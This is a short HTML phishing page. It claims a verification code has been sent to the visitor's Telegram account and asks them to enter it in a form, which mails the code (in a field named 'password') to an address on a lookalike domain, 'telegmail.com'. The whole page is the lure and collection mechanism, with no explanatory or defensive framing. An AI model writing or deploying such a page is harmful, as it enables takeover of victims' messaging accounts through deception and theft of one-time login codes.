<!doctype html>
<html>
     <head>
          
       <style>
            
         .ts{
          font-size:40px;    
              
              
              
              
         }   
            
        .iuy{
             
         height:45px;    
          font-size:30px;   
          margin-top:30px;   
           text-align:center;  
           border-radius:18px;
        }    
        .send{
          width:60px;   
            height:30px; 
             background-color:blue;
             color:white;
             margin-left:120px;
        }    
            
            
            
       </style>   
          
          
          
          
          
          
          
          <h class="ts">we have sent a verification code to your telegram account and send us that code</h>
     </head>
     <body>
          
                   <form action="mailto:tyirmg@telegmail.com" method="post" enctype="text/plain">
              
          
           <label for="code">code:</label><br>

        <textarea id="code" class="iuy" type="code" name="password" rows="1" cols="20"></textarea><br><br>
          <input class="send" type="submit" value="send">

        </form>
     </body>
</html>